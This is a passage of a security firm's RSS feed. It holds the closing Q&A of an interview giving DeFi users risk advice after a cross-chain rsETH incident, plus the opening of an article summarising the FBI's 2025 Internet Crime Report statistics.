12：普通⽤户看到这次事件，最直接的问题是：DeFi 现在还敢不敢参与？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DeFi 仍然可以参与，但需要调整⻛险意识和参与⽅式。核⼼建议是：</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">控制仓位，不要把⼤量资产押注在 &#34;跨链 + 再质押 + 借贷&#34; 叠加的⾼复杂度产品上 —— 层级越多，每⼀层的⻛险都在累加⽽不是抵消。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">优先透明度，选择定期公开安全报告、治理权限等信息的协议，⽽不是只看 &#34;年化多少&#34;。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">理解你持有的资产是什么，rsETH 不是 ETH，它是⼀个跨链合成资产，其价值依赖于⼀整条信任链的正常运作。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 1：普通⼈最应该避开的，是 &#34;结构太复杂看不懂的协议&#34; 吗？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是⼀个很好的⾃我保护原则。如果你⽆法⽤⼀句话说清楚 &#34;我的资产现在存在哪、被谁保管、如果某个环节出问题会发⽣什么&#34;，那这个⻛险就不应该在你的仓位⾥占太⼤⽐例。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 2：未来⽤户应该把 &#34;有没有审计&#34; 升级成更具体的问题？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对。&#34;有没有审计&#34; 是 2020 年的标准，今天⾄少应该问：审计覆盖了跨链配置吗？DVN 是⼏选⼏？治理多签是⼏ - of - ⼏、谁持有？这些信息应该是协议的标配披露，⽽不是⽤户需要去⽂档⾥挖的隐藏信息。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">⼗三、AI 时代：DeFi 未来还能做吗</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 13：在 AI 时代，DeFi 到底还有没有未来？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DeFi 的未来不仅存在，⽽且可能在 AI 时代获得真正意义上的安全基础设施升级。但这个未来不属于那些还在靠 &#34;复杂收益结构&#34; 吸引⽤户的协议，⽽属于那些率先引⼊以下能⼒的协议：</span></span></p><ul class="list-paddingleft-1"><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AI 驱动的实时链上⻛控：⾃动识别异常铸造、⾮正常资⾦流、跨协议的级联⻛险信号。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">链上保险与⾃动补偿机制：将安全保障从 &#34;事后追责&#34; 前移到 &#34;事中兜底&#34;。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">智能⻛险代理：代替普通⽤户持续监控其头⼨的⻛险敞⼝，在阈值触发时⾃动调仓或退出。</span></span></p></li></ul><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 1：AI 会不会让攻击变得更快？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">会。AI 可以被⽤来⾃动扫描链上配置漏洞、⽣成最优攻击路径、加速链下基础设施⼊侵的侦察过程。攻防两端都会被 AI 加速，这意味着防守⽅不能再依赖 &#34;⼈⼯发现&#34; 作为最后⼀道防线。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 2：AI 是否会迫使⾏业把安全从 &#34;成本中⼼&#34; 变成 &#34;产品核⼼能⼒&#34;？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是最值得期待的结构性变化。过去安全投⼊是 &#34;被迫的合规成本&#34;，未来当⽤户开始把 &#34;安全透明度&#34; 和 &#34;AI ⻛控能⼒ &#34; 作为选择协议的核⼼指标时，安全会变成差异化竞争⼒。这次事件加速了这个转变。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">⼗四、收尾⾦句</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 14：分别⽤⼀句话，送给普通⽤户、送给创业者、送给整个⾏业。</span></span></strong></p><ul class="list-paddingleft-1"><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">给普通⽤户：不要把跨链合成资产当成⽆⻛险资产 —— 你拿到的每⼀个百分点的额外收益，背后都有你看不⻅的信任假设在⽀撑。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">给创业者：安全预算不是产品上线后的附加选项，它是你的产品能否在真实市场⾥存活的前提条件。</span></span></p></li><li><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">给⾏业：DeFi 没有死，我们需要的不是更复杂的收益机制，⽽是更诚实的⻛险披露。</span></span></p></li></ul><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504729&amp;idx=1&amp;sn=aa1c7332bba7ac7bbe4f74220e2322e6&amp;scene=21#wechat_redirect" textvalue="解读｜FBI 发布《2025 年互联网犯罪报告》" data-itemshowtype="0" linktype="text" data-linktype="2">解读｜FBI 发布《2025 年互联网犯罪报告》</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504728&amp;idx=1&amp;sn=2e9d14cd251484f86669e24458daafb6&amp;scene=21#wechat_redirect" textvalue="慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 Hacking Time 邀您共探 AI × Web3 安全与合规新边界</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74&amp;scene=21#wechat_redirect" textvalue="慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504616&amp;idx=1&amp;sn=95677483334baedb3127bdc0911fa2f8&amp;scene=21#wechat_redirect" textvalue="慢雾：如何评估加密反洗钱工具的有效性" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：如何评估加密反洗钱工具的有效性</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCIGtpfJib3eOstmw4GfkjwwRFNYf830q2DMs4sWUYMuSTtlzozD2icoy4AicxedwYyT20cAsAjp53QgbPfcHKW72GolxOGOF1qPbw/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021092" src="https://wechat2rss.xlab.app/img-proxy/?k=e6ff163a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIGtpfJib3eOstmw4GfkjwwRFNYf830q2DMs4sWUYMuSTtlzozD2icoy4AicxedwYyT20cAsAjp53QgbPfcHKW72GolxOGOF1qPbw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=cb04ac3f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504741%26idx%3D1%26sn%3D73749cca984e571fbcd6cac83e515423">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 21 Apr 2026 12:04:00 +0800</pubDate>
    </item>
    <item>
      <title>解读｜FBI 发布《2025 年互联网犯罪报告》</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504729&amp;idx=1&amp;sn=aa1c7332bba7ac7bbe4f74220e2322e6</link>
      <description>本文将对报告内容进行解读，帮助读者提升对复杂网络诈骗及 AI 驱动型威胁的认知与防范能力。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾 AML 团队</span> <span>2026-04-16 11:29</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=90a55732&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCInLFQ82Dm3VNwCOhic6yXl1ueVyqq3MlCILAhxBcy12T8TeI64Sk29lOzfjC77YalMDzpjwB8xO8x798vztCibR0ysFyjEcYmT0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本文将对报告内容进行解读，帮助读者提升对复杂网络诈骗及 AI 驱动型威胁的认知与防范能力。</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 4 月 7 日，美国联邦调查局(FBI) 发布了《2025 年互联网犯罪报告》。该报告正值 FBI 网络犯罪举报中心(IC3) 成立 25 周年之际，基于 2025 年收集的超 100 万件投诉数据，深入分析了突破 208 亿美元的历史性损失规模、受害者画像、投资诈骗等核心犯罪类型，并重点关注了人工智能(AI) 在网络诈骗中的演变趋势及执法部门在资产追回方面的突破。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">本文将对报告的核心内容进行解读，帮助读者快速掌握 2025 年全球网络安全威胁的动态变化，提升对复杂网络诈骗及 AI 驱动型威胁的认知与防范能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021040" data-ratio="0.6462962962962963" width="602" data-type="png" data-w="1080" height="389" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=f02b1309&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKam6icLvVxj4RzGvjzmmHAvaab7k6OJcm6do8qxd3xkXNnCqSMmMQdEqPuB7sqXI2exYVHlgCo1av38SjhXibicccQobD7mkVfhE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 14px;font-weight: normal;">(点击文末的阅读原文可查看原版报告)</span></span></p></b></b></b></p><h1 dir="ltr" style="line-height: 1.38;margin-top: 20pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">关键点一：2025 年 IC3 的投诉数据</span></span></h1><h2 dir="ltr" style="line-height:1.38;margin-top:18pt;margin-bottom:6pt;"><span style="white-space:pre-wrap;font-size:16pt;font-family:Roboto,sans-serif;color:#000000;background-color:transparent;font-weight:300;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">1. 整体情况</span></span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025 年，IC3 共收到 1,008,597 起投诉，涉及的总损失金额高达 208.77 亿美元，较 2024 年增长 26%，平均每起事件导致损失约 20,699 美元。其中，85% 的损失由网络诈骗造成。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: 